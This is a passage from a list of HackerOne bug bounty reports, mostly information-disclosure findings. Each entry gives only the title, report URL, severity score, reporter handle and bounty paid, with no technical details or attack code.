morax
### Bounty paid
null
---
### Title
Information disclosure vulnerability on a DoD website
#### URL
https://hackerone.com/reports/186530
#### Severity score
null
#### Reporter
reptou
### Bounty paid
null
---
### Title
Information leakage on https://docs.gdax.com
#### URL
https://hackerone.com/reports/168509
#### Severity score
null
#### Reporter
0xorigin
### Bounty paid
$100
---
### Title
Information leakage via CSV when content is valid JavaScript
#### URL
https://hackerone.com/reports/207266
#### Severity score
null
#### Reporter
mikkocarreon
### Bounty paid
$750
---
### Title
Просмотр любых статей по их айди.
#### URL
https://hackerone.com/reports/589400
#### Severity score
null
#### Reporter
cheatboss
### Bounty paid
$200
---
### Title
Project Milestones Disclosed Via Groups When the Victim disabled milestones access in project settings
#### URL
https://hackerone.com/reports/636560
#### Severity score
null
#### Reporter
uzsunnyz
### Bounty paid
$1,000
---
### Title
Full Path Disclosure (FPD) in www.localize.im
#### URL
https://hackerone.com/reports/9745
#### Severity score
null
#### Reporter
faisalahmed
### Bounty paid
null
---
### Title
Ability to see common response titles of other teams (limited)
#### URL
https://hackerone.com/reports/31383
#### Severity score
null
#### Reporter
prakharprasad
### Bounty paid
$1,000
---
### Title
openssh-server Forced Command Handling Information Disclosure Vulnerability on blog.greenhouse.io
#### URL
https://hackerone.com/reports/24984
#### Severity score
null
#### Reporter
simon90
### Bounty paid
null
---
### Title
No email verification on username change
#### URL
https://hackerone.com/reports/29331
#### Severity score
null
#### Reporter
shahmeer-amir
### Bounty paid
$500
---
### Title
[Partial] SSN & [PII] exposed through iPERMs Presentation Slide.
#### URL
https://hackerone.com/reports/719631
#### Severity score
null
#### Reporter
europol
### Bounty paid
null
---
### Title
Confidential data of users and limited metadata of programs and reports accessible via GraphQL
#### URL
https://hackerone.com/reports/489146
#### Severity score
9.3
#### Reporter
yashrs
### Bounty paid
$20,000
---
### Title
Slack-Corp Heroku application disclosing limited info about company members
#### URL
https://hackerone.com/reports/966814
#### Severity score
3.7
#### Reporter
demonia
### Bounty paid
$300
---
### Title
User object in GraphQL exposes number of trial reports for External Programs that also have a Private Program
#### URL
https://hackerone.com/reports/350964
#### Severity score
null
#### Reporter
ashish_r_padelkar
### Bounty paid
null
---
### Title
Hidden scheduled partner events are propagated to Steam clients in CMsgClientClanState
#### URL
https://hackerone.com/reports/780167
#### Severity score
null
#### Reporter
xpaw
### Bounty paid
$750
---
### Title
Full path disclosure on track.uber.com
#### URL
https://hackerone.com/reports/125197
#### Severity score
null
#### Reporter
firs0v
### Bounty paid
$100
---
### Title
Leak of all project names and all user names , even across applications
#### URL
https://hackerone.com/reports/152696
#### Severity score
null
#### Reporter
eboda
### Bounty paid
$1,000
---
### Title
Логи на http://login.aa.mail.ru/logs/
#### URL
https://hackerone.com/reports/985272
#### Severity score
null
#### Reporter
devirok
### Bounty paid
$150
---
### Title
Nginx misconfiguration leading to direct PHP source code download
#### URL
https://hackerone.com/reports/268382
#### Severity score
null
#### Reporter
tolo7010
### Bounty paid
$750
---
### Title
Information disclosure vulnerability on a DoD website
#### URL
https://hackerone.com/reports/195836
#### Severity score
null
#### Reporter
sp1d3rs
### Bounty paid
null
---
### Title
Imformation Disclosure on id.rapida.ru
#### URL
https://hackerone.com/reports/318571
#### Severity score
null
#### Reporter
danila
### Bounty paid
$100
---
### Title
comment out causes information disclosure
#### URL
https://hackerone.com/reports/57125
#### Severity score
null
#### Reporter
shhnjk
### Bounty paid
null
---
### Title
AXFR на plexus.m.smailru.net работает
#### URL
https://hackerone.com/reports/137093
#### Severity score
null
#### Reporter
isox
### Bounty paid
null
---
### Title
Smartsheet employees email disclosure through enpoint after login.
#### URL
https://hackerone.com/reports/880089
#### Severity score
3.7
#### Reporter
soareswallace
### Bounty paid
$100
---
### Title
Server side information disclosure on a DoD website
#### URL
https://hackerone.com/reports/191830
#### Severity score
null
#### Reporter
samhax
### Bounty paid
null
---
### Title
SSRF in upload IMG through URL
#### URL
https://hackerone.com/reports/228377
#### Severity score
null
#### Reporter
mariuszpoplawski
### Bounty paid
$64
---
### Title
full path disclosure on world.engelvoelkers.com via error messages
#### URL
https://hackerone.com/reports/809645
#### Severity score
null
#### Reporter
organiccrap
### Bounty paid
null
---
### Title
.git file accessible on remote.bittorrent.com
#### URL
https://hackerone.com/reports/846400
#### Severity score
null
#### Reporter
aslanemre
### Bounty paid
null
---
### Title
Validation message in Bounty award endpoint can be used to determine program balances
#### URL
https://hackerone.com/reports/293299
#### Severity score
5
#### Reporter
cyriac
### Bounty paid
$1,500
---
### Title
Information disclosure
#### URL
https://hackerone.com/reports/152499
#### Severity score
null
#### Reporter
amirisme
### Bounty paid
null
---
### Title
SharePoint exposed web services
#### URL
https://hackerone.com/reports/300539
#### Severity score
null
#### Reporter
linkks
### Bounty paid
null
---
### Title
Minimum bounty of a private program is visible for users that were removed from the program
#### URL
https://hackerone.com/reports/94336
#### Severity score
null
#### Reporter
coolboss
### Bounty paid
null
---
### Title
Minimal information disclosure of internal asset names and links which were not publicly accessible.
#### URL
https://hackerone.com/reports/805699
#### Severity score
null
#### Reporter
e4366eolywrgpidfbio
### Bounty paid
null
---
### Title
Compromising the user ID
#### URL
https://hackerone.com/reports/358007
#### Severity score
null
#### Reporter
jarvis7
### Bounty paid
$280
---
### Title
Publicly accessible Grafana install allows pivoting to Prometheus datasource
#### URL
https://hackerone.com/reports/764731
#### Severity score
null
#### Reporter
gnarlygoat
### Bounty paid
null
---
### Title
full path disclosure vulnerability at https://security.olx.com/*
#### URL
https://hackerone.com/reports/159481
#### Severity score
null
#### Reporter
unkn7wn
### Bounty paid
null
---
### Title
Ngnix Server version disclosure
#### URL
https://hackerone.com/reports/141125
#### Severity score
null
#### Reporter
ahsan
### Bounty paid
$50
---
### Title
Deleted name still present via mouseover functionality for user accounts
#### URL
https://hackerone.com/reports/127914
#### Severity score
null
#### Reporter
meals
### Bounty paid
null
---
### Title
Publicly accessible Order confirmations leaking User Emails on ███
#### URL
https://hackerone.com/reports/323992
#### Severity score
null
#### Reporter
alyssa_herrera
### Bounty paid
null
---
### Title
Team object in GraphQL disclosed private_comment
#### URL
https://hackerone.com/reports/978143
#### Severity score
5
#### Reporter
haxta4ok00
### Bounty paid
$2,500
---
### Title
Shopify GitHub Login and Password exposed all private source code might be available.
#### URL
https://hackerone.com/reports/124100
#### Severity score
null
#### Reporter
todayisnew
### Bounty paid
$1,500
---
### Title
Report Private Links Leaks to Google Analytics via Query String Param
#### URL
https://hackerone.com/reports/269479
#### Severity score
null
#### Reporter
r3y
### Bounty paid
null
---
### Title
Unauthorized access to private project security dashboard
#### URL
https://hackerone.com/reports/853355
#### Severity score
null
#### Reporter
vaib25vicky
### Bounty paid
$2,000
---
### Title
Microsoft IIS tilde directory enumeration
#### URL
https://hackerone.com/reports/148777
#### Severity score
null
#### Reporter
linkks
### Bounty paid
$20
---
### Title
Disclosure of external users invited to a specific report
#### URL
https://hackerone.com/reports/157699
#### Severity score
null
#### Reporter
kirils
### Bounty paid
$500
---
### Title
Hadoop Node available to public
#### URL
https://hackerone.com/reports/44052
#### Severity score
null
#### Reporter
isox
### Bounty paid
$150
---
### Title
JIRA account misconfig causes internal info leak
#### URL
https://hackerone.com/reports/139970
#### Severity score
null
#### Reporter
kamil_hism
### Bounty paid
null
---
### Title
Torrent Viewer extension web service available on all interfaces
#### URL
https://hackerone.com/reports/300181
#### Severity score
null
#### Reporter
beurtschipper
### Bounty paid
$200
---
### Title
Total Paid Bounty Paid can be disclose
#### URL
https://hackerone.com/reports/674757
#### Severity score
null
#### Reporter
zrachessanasz
### Bounty paid
$500
---
### Title
Monitor
#### URL
https://hackerone.com/reports/265786
#### Severity score
null
#### Reporter
linkks
### Bounty paid
null
---
### Title
Shopify's SF and LA offices Dashboard Information disclosed via Public Gist
#### URL
https://hackerone.com/reports/729040
#### Severity score
null
#### Reporter
ehsahil
### Bounty paid
$500
---
### Title
Admin/Info lekage
#### URL
https://hackerone.com/reports/964315
#### Severity score
null
#### Reporter
abhhi
### Bounty paid
null
---
### Title
Просмотр любых записей на стене
#### URL
https://hackerone.com/reports/341675
#### Severity score
null
#### Reporter
trainzment
### Bounty paid
$700
---
### Title
Invitation token leaks to https://bat.bing.com
#### URL
https://hackerone.com/reports/301526
#### Severity score
2.7
#### Reporter
zuriel
### Bounty paid
$500
---
### Title
Requestor Email Disclosure via Email Notification
#### URL
https://hackerone.com/reports/202361
#### Severity score
null
#### Reporter
japz
### Bounty paid
null
---
### Title
don't leak Server version for assets.gratipay.com
#### URL
https://hackerone.com/reports/149710
#### Severity score
null
#### Reporter
japz
### Bounty paid
null
---
### Title
Вывод значений переменных Nginx в теле страницы
#### URL
https://hackerone.com/reports/370094
#### Severity score
null
#### Reporter
webr0ck
### Bounty paid
$300
---
### Title
AWS bucket leading to iOS test build code and configuration exposure
#### URL
https://hackerone.com/reports/404822
#### Severity score
null
#### Reporter
kiyell
### Bounty paid
$1,500
---
### Title
DNSSEC Zone Walk using NSEC Records
#### URL
https://hackerone.com/reports/228471
#### Severity score
0
#### Reporter
pk21
### Bounty paid
null
---
### Title
GFM renderer leaks external issue tracker URL of private project
#### URL
https://hackerone.com/reports/133717
#### Severity score
null
#### Reporter
jobert
### Bounty paid
null
---
### Title
Способ узнать имя человека удаленной страницы 2
#### URL
https://hackerone.com/reports/193759
#### Severity score
null
#### Reporter
pisarenko
### Bounty paid
null
---
### Title
De-anonymization Attack: Cross Site Information Leakage
#### URL
https://hackerone.com/reports/723175
#### Severity score
null
#### Reporter
soheilkhodayari
### Bounty paid
$250
---
### Title
Lack of CNAME/A Record Trimming Pointing Uber Domains to Insecure Non-Uber AWS Instances/Sites
#### URL
https://hackerone.com/reports/125118
#### Severity score
null
#### Reporter
jutsuce
### Bounty paid
$1,500
---
### Title
Using GraphQL, STAFF with NO explicit permissions on Store can retrieve Shopify Payments Balance.
#### URL
https://hackerone.com/reports/417170
#### Severity score
3.4
#### Reporter
h13-
### Bounty paid
$500
---
### Title
Pending member invitations are not revoked on program name change
#### URL
https://hackerone.com/reports/275293
#### Severity score
null
#### Reporter
ashish_r_padelkar
### Bounty paid
null
---
### Title
User Enumeration
#### URL
https://hackerone.com/reports/280509
#### Severity score
null
#### Reporter
saikiran-10098
### Bounty paid
null
---
### Title
2 Directory Listing on ledger.brave.com & vault-staging.brave.com
#### URL
https://hackerone.com/reports/175320
#### Severity score
null
#### Reporter
bibo
### Bounty paid
$50
---
### Title
Know undisclosed Bounty Amount when Bounty Statistics are enabled.
#### URL
https://hackerone.com/reports/148050
#### Severity score
null
#### Reporter
vijay_kumar
### Bounty paid
$500
---
### Title
Sensitive user information disclosure at bonjour.uber.com/marketplace/_rpc via the 'userUuid' parameter
#### URL
https://hackerone.com/reports/542340
#### Severity score
8.5
#### Reporter
anandprakash_
### Bounty paid
$6,500
---
### Title
Information About Your System(Sensitive Directories)
#### URL
https://hackerone.com/reports/200572
#### Severity score
null
#### Reporter
socialfox
### Bounty paid
null
---
### Title
full path disclosure from false language
#### URL
https://hackerone.com/reports/13237
#### Severity score
null
#### Reporter
brook2
### Bounty paid
null
---
### Title
CORS misconfiguration leads to users information disclosure at https://studyroom.line.me
#### URL
https://hackerone.com/reports/924951
#### Severity score
5.7
#### Reporter
dhbd88
### Bounty paid
$3,000
---
### Title
Activities are not Protected and able to crash app using other app (Can Malware or third parry app).
#### URL
https://hackerone.com/reports/65729
#### Severity score
null
#### Reporter
bugwrangler
### Bounty paid
$150
---
### Title
Dropcontact's disclosed report is exposing Private/Confidential information
#### URL
https://hackerone.com/reports/963327
#### Severity score
8.2
#### Reporter
n1m0
### Bounty paid
null
---
### Title
Server side information disclosure
#### URL
https://hackerone.com/reports/192577
#### Severity score
null
#### Reporter
samhax
### Bounty paid
null
---
### Title
SharePoint Web Services Exposed to Anonymous Access
#### URL
https://hackerone.com/reports/920401
#### Severity score
null
#### Reporter
balisong
### Bounty paid
null
---
### Title
Imgur dev environments facing the Internet
#### URL
https://hackerone.com/reports/100916
#### Severity score
null
#### Reporter
nathonsecurity
### Bounty paid
$500
---
### Title
information disclose
#### URL
https://hackerone.com/reports/223759
#### Severity score
null
#### Reporter
abdul1ah
### Bounty paid
null
---
### Title
[informatica.com]- Information Disclosure
#### URL
https://hackerone.com/reports/204239
#### Severity score
null
#### Reporter
irotem2
### Bounty paid
null
---
### Title
Disclosed Version of PORTS SSH|HTTP|SSL
#### URL
https://hackerone.com/reports/358102
#### Severity score
null
#### Reporter
bb00x
### Bounty paid
null
---
### Title
Wordpress users disclosure on blog.makerdao.con
#### URL
https://hackerone.com/reports/684701
#### Severity score
null
#### Reporter
ardi4x
### Bounty paid
null
---
### Title
User guessing/enumeration at sw.khanacademy.org
#### URL
https://hackerone.com/reports/6376
#### Severity score
null
#### Reporter
internetwache
### Bounty paid
null
---
### Title
[razer-assets2] Listing of Amazon S3 Bucket accessible to any AWS cli
#### URL
https://hackerone.com/reports/710319
#### Severity score
null
#### Reporter
snwlol
### Bounty paid
$250
---
### Title
Full Path Disclosure
#### URL
https://hackerone.com/reports/9137
#### Severity score
null
#### Reporter
mohamed_fouad
### Bounty paid
null
---
### Title
credentials leakage in public lead to view dev websites
#### URL
https://hackerone.com/reports/511440
#### Severity score
null
#### Reporter
xsam
### Bounty paid
$400
---
### Title
Partial disclosure of undisclosed programs through <meta> tags
#### URL
https://hackerone.com/reports/302620
#### Severity score
null
#### Reporter
bigbug
### Bounty paid
null
---
### Title
████ discloses valid Airbnb SSO login names via Google Search Results
#### URL
https://hackerone.com/reports/161659
#### Severity score
null
#### Reporter
aesteral
### Bounty paid
null
---
### Title
bug reporting template encourages users to paste config file with passwords
#### URL
https://hackerone.com/reports/196969
#### Severity score
null
#### Reporter
hanno
### Bounty paid
null
---
### Title
Hijacking user session by forcing the use of invalid HTTPs Certificate on images.gratipay.com
#### URL
https://hackerone.com/reports/124976
#### Severity score
null
#### Reporter
ashesh
### Bounty paid
$1
---
### Title
Amazon Bucket Accessible (http://inpref.s3.amazonaws.com/)
#### URL
https://hackerone.com/reports/137487
#### Severity score
null
#### Reporter
xmly
### Bounty paid
$100
---
### Title
[qiwi.com] .bash_history
#### URL
https://hackerone.com/reports/190195
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
$100
---
### Title
[ling.go.mail.ru] Server-Status opened for all users
#### URL
https://hackerone.com/reports/90691
#### Severity score
null
#### Reporter
bigbear_
### Bounty paid
null
---
### Title
Ngnix Server version disclosure.
#### URL
https://hackerone.com/reports/947637
#### Severity score
null
#### Reporter
kapkan
### Bounty paid
null
---
### Title
Instagram OAuth2 Implementation Leaks Access Token; Allows for Cross-Site Script Inclusion (XSSI)
#### URL
https://hackerone.com/reports/138270
#### Severity score
null
#### Reporter
dejavuln
### Bounty paid
null
---
### Title
Нежелательная информация
#### URL
https://hackerone.com/reports/34799
#### Severity score
null
#### Reporter
bigbear
### Bounty paid
null
---
### Title
Version Disclosure (NginX)
#### URL
https://hackerone.com/reports/94610
#### Severity score
null
#### Reporter
protector47
### Bounty paid
$20
---
### Title
Admin Login Credential Leak for DoD Gitlab EE instance
#### URL
https://hackerone.com/reports/799898
#### Severity score
null
#### Reporter
daehee
### Bounty paid
null
---
### Title
Root user disclosure in data.gov domain though x-amz-meta-s3cmd-attrs header
#### URL
https://hackerone.com/reports/374907
#### Severity score
null
#### Reporter
sneakerz
### Bounty paid
$150
---
### Title
[expressjs-ip-control] Whitelist IP bypass leads to authorization bypass and sensitive info disclosure
#### URL
https://hackerone.com/reports/693788
#### Severity score
null
#### Reporter
mik317
### Bounty paid
null
---
### Title
Accessable Htaccess
#### URL
https://hackerone.com/reports/171272
#### Severity score
null
#### Reporter
nigba
### Bounty paid
null
---
### Title
Visibility Robots.txt file
#### URL
https://hackerone.com/reports/156182
#### Severity score
null
#### Reporter
nigba
### Bounty paid
null
---
### Title
PHP PDOException and Full Path Disclosure
#### URL
https://hackerone.com/reports/15899
#### Severity score
null
#### Reporter
supernatural
### Bounty paid
null
---
### Title
Backup Source Code Detected
#### URL
https://hackerone.com/reports/309537
#### Severity score
null
#### Reporter
linkks
### Bounty paid
$500
---
### Title
Un-handled exception leads to Information Disclosure
#### URL
https://hackerone.com/reports/96847
#### Severity score
null
#### Reporter
sarwarjahan
### Bounty paid
$50
---
### Title
Search query text, including from potentially undisclosed reports, sent to Google Analytics on Inbox query page
#### URL
https://hackerone.com/reports/280770
#### Severity score
null
#### Reporter
holvonix-advay
### Bounty paid
null
---
### Title
WordPress username enumeration (/author)
#### URL
https://hackerone.com/reports/335427
#### Severity score
null
#### Reporter
linkks
### Bounty paid
$50
---
### Title
GIT Detected
#### URL
https://hackerone.com/reports/221298
#### Severity score
null
#### Reporter
lulliii
### Bounty paid
null
---
### Title
Listing of Amazon S3 Bucket accessible to any amazon authenticated user (vector-maps-e457472599)
#### URL
https://hackerone.com/reports/631529
#### Severity score
null
#### Reporter
zer0ttl
### Bounty paid
null
---
### Title
Просмотр Участников ЧАСТНОЙ встречи
#### URL
https://hackerone.com/reports/261764
#### Severity score
null
#### Reporter
pisarenko
### Bounty paid
$100
---
### Title
Breach Attack Vulnerability
#### URL
https://hackerone.com/reports/17311
#### Severity score
null
#### Reporter
anonymous_india
### Bounty paid
null
---
### Title
[p2p.qiwi.com] nginx alias traversal
#### URL
https://hackerone.com/reports/455858
#### Severity score
null
#### Reporter
bobrov
### Bounty paid
$150
---
### Title
Leaking sensitive information on Github lead full access to all Grab Slack channels
#### URL
https://hackerone.com/reports/397527
#### Severity score
null
#### Reporter
xsam
### Bounty paid
$7,000
---
### Title
None permission staff member can identify installed application and products attached to it
#### URL
https://hackerone.com/reports/848625
#### Severity score
null
#### Reporter
sreeju_kc
### Bounty paid
$500
---
### Title
Manipulate hacker profile and private program hacktivity to expose your name as researchers who is actively submitting reports with resolve status
#### URL
https://hackerone.com/reports/654198
#### Severity score
3.4
#### Reporter
japz
### Bounty paid
$500
---
### Title
Non-Cloudflare IPs allowed to access origin servers
#### URL
https://hackerone.com/reports/255978
#### Severity score
null
#### Reporter
moritz30
### Bounty paid
$50
---
### Title
Логи/sql запросы на http://mx36.ucs.ru/ и reflected XSS.
#### URL
https://hackerone.com/reports/900930
#### Severity score
null
#### Reporter
0x01alka
### Bounty paid
$400
---
### Title
Information Disclosure on lite.uber.com
#### URL
https://hackerone.com/reports/133375
#### Severity score
null
#### Reporter
kusl
### Bounty paid
null
---
### Title
Anonymous file drop page ignores user profile visibility restrictions
#### URL
https://hackerone.com/reports/752353
#### Severity score
null
#### Reporter
pshknst
### Bounty paid
null
---
### Title
readble .htaccess + Source Code Disclosure (+ .SVN repository)
#### URL
https://hackerone.com/reports/7813
#### Severity score
null
#### Reporter
nahamsec
### Bounty paid
$250
---
### Title
Directory Listening
#### URL
https://hackerone.com/reports/151772
#### Severity score
null
#### Reporter
kiraak-boy
### Bounty paid
null
---
### Title
Android MailRu Email: Thirdparty can access private data files with small user interaction
#### URL
https://hackerone.com/reports/226191
#### Severity score
4.4
#### Reporter
dzmitry
### Bounty paid
$300
---
### Title
[Brave browser] WebTorrent has DNS rebinding vulnerability
#### URL
https://hackerone.com/reports/663729
#### Severity score
null
#### Reporter
xiaoyinl
### Bounty paid
$100
---
### Title
[RCE] Unserialize to XXE - file disclosure on ams.upload.pornhub.com
#### URL
https://hackerone.com/reports/142562
#### Severity score
null
#### Reporter
5haked
### Bounty paid
$10,000
---
### Title
Number of invited researchers disclosed as part of JSON search response
#### URL
https://hackerone.com/reports/80597
#### Severity score
null
#### Reporter
jessescitech
### Bounty paid
$500
---
### Title
DIrectory Listing Found
#### URL
https://hackerone.com/reports/138558
#### Severity score
null
#### Reporter
harikrishnan_c
### Bounty paid
null
---
### Title
Information disclosure through search engines (password reset token)
#### URL
https://hackerone.com/reports/322988
#### Severity score
6.1
#### Reporter
nitesculucian
### Bounty paid
null
---
### Title
Просмотр инфы на странице пользователя или группы который тебя добавил в ЧС
#### URL
https://hackerone.com/reports/505347
#### Severity score
null
#### Reporter
pisarenko
### Bounty paid
$200
---
### Title
beta version reveals paths, environment variables and partially files contents
#### URL
https://hackerone.com/reports/129869
#### Severity score
null
#### Reporter
uyga
### Bounty paid
null
---
### Title
[opensource.mail.ru] system accounts enumeration
#### URL
https://hackerone.com/reports/153178
#### Severity score
null
#### Reporter
konqi
### Bounty paid
null
---
### Title
Administrator(s) Information disclosure via JSON on wordpress.org
#### URL
https://hackerone.com/reports/221734
#### Severity score
null
#### Reporter
596a96cc7bf9108cd896f33c4
### Bounty paid
null
---
### Title
H1514 Get access to non public information by pivoting with graphql queries
#### URL
https://hackerone.com/reports/423388
#### Severity score
null
#### Reporter
emitrani
### Bounty paid
$1,500
---
### Title
User Enumeration : Due to rate limiting on registration
#### URL
https://hackerone.com/reports/97609
#### Severity score
null
#### Reporter
shailesh4594
### Bounty paid
null
---
### Title
[allods.my.com] Full Path Disclosure
#### URL
https://hackerone.com/reports/97319
#### Severity score
null
#### Reporter
bigbear_
### Bounty paid
null
---
### Title
Exposed Git Repo at http://betaforum.tomtom.com/.git/{subfolders}
#### URL
https://hackerone.com/reports/541349
#### Severity score
null
#### Reporter
daniel_v
### Bounty paid
null
---
### Title
Bypass of anti-SSRF defenses in YahooCacheSystem (affecting at least YQL and Pipes)
#### URL
https://hackerone.com/reports/1066
#### Severity score
null
#### Reporter
agarri_fr
### Bounty paid
null
---
### Title
Option method enabled in kartpay Webservers
#### URL
https://hackerone.com/reports/642862
#### Severity score
null
#### Reporter
lollol1
### Bounty paid
null
---
### Title
GetGlobalAchievementPercentagesForApp is missing the same release checks as GetSchemaForGame
#### URL
https://hackerone.com/reports/541020
#### Severity score
6.8
#### Reporter
xpaw
### Bounty paid
$1,650
---
### Title
Server Side Request Forgery in macro creation
#### URL
https://hackerone.com/reports/50537
#### Severity score
null
#### Reporter
haquaman
### Bounty paid
null
---
### Title
Phpinfo
#### URL
https://hackerone.com/reports/521582
#### Severity score
0
#### Reporter
linkks
### Bounty paid
null
---
### Title
Brave payments remembers history even after clearing all browser data.
#### URL
https://hackerone.com/reports/203088
#### Severity score
2.1
#### Reporter
sumit
### Bounty paid
null
---
### Title
Information disclosure on a DoD website
#### URL
https://hackerone.com/reports/184076
#### Severity score
null
#### Reporter
tsug0d
### Bounty paid
null
---
### Title
Badoo and Hotornot User Disclosure
#### URL
https://hackerone.com/reports/130453
#### Severity score
null
#### Reporter
symbiansymoh
### Bounty paid
null
---
### Title
information disclosure (LOAD BALANCER + URI XSS)
#### URL
https://hackerone.com/reports/8284
#### Severity score
null
#### Reporter
nnwakelam
### Bounty paid
$300
---
### Title
Arbitary file download vulnerability on a DoD website
#### URL
https://hackerone.com/reports/186326
#### Severity score
null
#### Reporter
alyssa_herrera
### Bounty paid
null
---
### Title
Disclosure of Email title report in quick award paypout email (no content mode)
#### URL
https://hackerone.com/reports/689997
#### Severity score
null
#### Reporter
kunal94
### Bounty paid
$500
---
### Title
Using GET method for account login with CSRF token leaking to external sites Via Referer.
#### URL
https://hackerone.com/reports/76733
#### Severity score
null
#### Reporter
bugs3ra
### Bounty paid
$25
---
### Title
Wordpress Version Disclosure Bug On Nextcloud
#### URL
https://hackerone.com/reports/188132
#### Severity score
null
#### Reporter
cr4zyrud
### Bounty paid
null
---
### Title
Bypass fix in https://hackerone.com/reports/151516 report.
#### URL
https://hackerone.com/reports/160520
#### Severity score
null
#### Reporter
0x01alka
### Bounty paid
$100
---
### Title
Information Disclosure (Directory Structure)
#### URL
https://hackerone.com/reports/7930
#### Severity score
null
#### Reporter
rajuraju14
### Bounty paid
null
---
### Title
Metadata in hosted files is disclosing Usernames, Printers, paths, admin guides. emails
#### URL
https://hackerone.com/reports/36586
#### Severity score
null
#### Reporter
jmiroche
### Bounty paid
null
---
### Title
http://conf.member.yahoo.com configuration file disclosure
#### URL
https://hackerone.com/reports/2598
#### Severity score
null
#### Reporter
nnwakelam
### Bounty paid
$100
---
### Title
Full path disclosure at https://keybase.io/_/api/1.0/invitation_request.json
#### URL
https://hackerone.com/reports/77319
#### Severity score
null
#### Reporter
s_p_q_r
### Bounty paid
$100
---
### Title
Information disclosure (system username) in the x-amz-meta-s3cmd-attrs response header on federation.data.gov
#### URL
https://hackerone.com/reports/262649
#### Severity score
null
#### Reporter
sp1d3rs
### Bounty paid
$150
---
### Title
[www.werkenbijbakertilly.nl] Information Disclosure
#### URL
https://hackerone.com/reports/892610
#### Severity score
null
#### Reporter
what_web
### Bounty paid
$50
---
### Title
Information disclosure with sensitive data
#### URL
https://hackerone.com/reports/703600
#### Severity score
6.1
#### Reporter
mickey01
### Bounty paid
$1,500
---
### Title
Client secret, server tokens for developer applications returned by internal API
#### URL
https://hackerone.com/reports/419655
#### Severity score
null
#### Reporter
anandprakash_
### Bounty paid
$5,000
---
### Title
History Disclosure of MS-Dos
#### URL
https://hackerone.com/reports/5549
#### Severity score
null
#### Reporter
siddiki
### Bounty paid
null
---
### Title
Disclosure of Program email Title Report when being removed as contributor. Bypass for Report #645264
#### URL
https://hackerone.com/reports/669776
#### Severity score
3.4
#### Reporter
hisokamorou
### Bounty paid
$500
---
### Title
View Any Program's Team Members through GET https://hackerone.com/invitations/
#### URL
https://hackerone.com/reports/283014
#### Severity score
null
#### Reporter
nickcas
### Bounty paid
$1,000
---
### Title
Multiple issues in Libxml2 (2.9.2 - 2.9.5)
#### URL
https://hackerone.com/reports/293126
#### Severity score
5.4
#### Reporter
xixabangm4
### Bounty paid
null
---
### Title
Information Leak - GitHub - Endpoint Configuration Details
#### URL
https://hackerone.com/reports/378558
#### Severity score
null
#### Reporter
peuch
### Bounty paid
null
---
### Title
don't leak server version of grtp.co in error pages
#### URL
https://hackerone.com/reports/136720
#### Severity score
null
#### Reporter
dotnick
### Bounty paid
$1
---
### Title
Internal Hostname disclosure from multiple Apache servers via blank host header method
#### URL
https://hackerone.com/reports/548094
#### Severity score
null
#### Reporter
jackb898
### Bounty paid
$150
---
### Title
Invitation tokens leak to Google Analytics
#### URL
https://hackerone.com/reports/237262
#### Severity score
3.1
#### Reporter
h33t
### Bounty paid
null
---
### Title
vidyard api auth_token exposed
#### URL
https://hackerone.com/reports/878434
#### Severity score
null
#### Reporter
stilou
### Bounty paid
null
---
### Title
User credentials are sent in clear text
#### URL
https://hackerone.com/reports/7950
#### Severity score
null
#### Reporter
ashesh
### Bounty paid
null
---
### Title
Node modules path disclosure due to lack of error handling
#### URL
https://hackerone.com/reports/225537
#### Severity score
null
#### Reporter
apapedulimu
### Bounty paid
$300
---
### Title
Host header poisoning leads to account password reset links hijacking
#### URL
https://hackerone.com/reports/167631
#### Severity score
null
#### Reporter
yassineaboukir
### Bounty paid
null
---
### Title
Potential linkage of public/private (anonymous) node addresses
#### URL
https://hackerone.com/reports/766963
#### Severity score
null
#### Reporter
ahook
### Bounty paid
null
---
### Title
Open SonarQube instance leaking internal source code
#### URL
https://hackerone.com/reports/947946
#### Severity score
null
#### Reporter
aksquare
### Bounty paid
null
---
### Title
Team object in GraphQL disclosed total number of whitelisted hackers
#### URL
https://hackerone.com/reports/342978
#### Severity score
5
#### Reporter
haxta4ok00
### Bounty paid
$2,500
---
### Title
SMTP Failure Leads to Chain of Internal System Failure
#### URL
https://hackerone.com/reports/642488
#### Severity score
null
#### Reporter
bb00x
### Bounty paid
null
---
### Title
leak receipt of another user
#### URL
https://hackerone.com/reports/61371
#### Severity score
null
#### Reporter
adrianbelen
### Bounty paid
$150
---
### Title
Information Leak - Github - JMS Information
#### URL
https://hackerone.com/reports/360811
#### Severity score
null
#### Reporter
peuch
### Bounty paid
$1,000
---
### Title
report id is exposed for undisclosed reports in Hacktivity
#### URL
https://hackerone.com/reports/493484
#### Severity score
null
#### Reporter
0619
### Bounty paid
null
---
### Title
Full Path Disclosure
#### URL
https://hackerone.com/reports/7972
#### Severity score
null
#### Reporter
nahamsec
### Bounty paid
null
---
### Title
Wordpress Users Disclosure
#### URL
https://hackerone.com/reports/625199
#### Severity score
null
#### Reporter
abay
### Bounty paid
null
---
### Title
Potentially sensitive information disclosure on a DoD website
#### URL
https://hackerone.com/reports/207236
#### Severity score
null
#### Reporter
scraps
### Bounty paid
null
---
### Title
Смотрим фотографии из частных/закрытых групп.
#### URL
https://hackerone.com/reports/321594
#### Severity score
null
#### Reporter
executor
### Bounty paid
$500
---
### Title
Nginx Version Disclosure
#### URL
https://hackerone.com/reports/214570
#### Severity score
null
#### Reporter
lulliii
### Bounty paid
null
---
### Title
H1514 [beerify.shopifycloud.com] GraphQL discloses internal beer consumption
#### URL
https://hackerone.com/reports/419883
#### Severity score
null
#### Reporter
emitrani
### Bounty paid
$802.20
---
### Title
Information disclosure at https://printshop.engelvoelkers.com/packages/.bash_history
#### URL
https://hackerone.com/reports/890285
#### Severity score
3.7
#### Reporter
carambax
### Bounty paid
null
---
### Title
Stealing livechat token and using it to chat as the user - user information disclosure
#### URL
https://hackerone.com/reports/151058
#### Severity score
null
#### Reporter
zombiehelp54
### Bounty paid
$1,500
---
### Title
Information disclousure by clicking on the link shown in http://████████/
#### URL
https://hackerone.com/reports/708019
#### Severity score
null
#### Reporter
pirateducky
### Bounty paid
null
---
### Title
Users with member privilege are able to see emails and membership information of other users
#### URL
https://hackerone.com/reports/244781
#### Severity score
null
#### Reporter
hackedbrain
### Bounty paid
null
---
### Title
Access to all files of remote user through shared file
#### URL
https://hackerone.com/reports/258084
#### Severity score
6.8
#### Reporter
xuesheng
### Bounty paid
$750
---
### Title
Information disclosure vulnerability on a DoD website
#### URL
https://hackerone.com/reports/197055
#### Severity score
null
#### Reporter
sp1d3rs
### Bounty paid
null
---
### Title
"Bounties paid in the last 90 days" discloses the undisclosed bounty amount in program statistics
#### URL
https://hackerone.com/reports/696266
#### Severity score
3.8
#### Reporter
japz
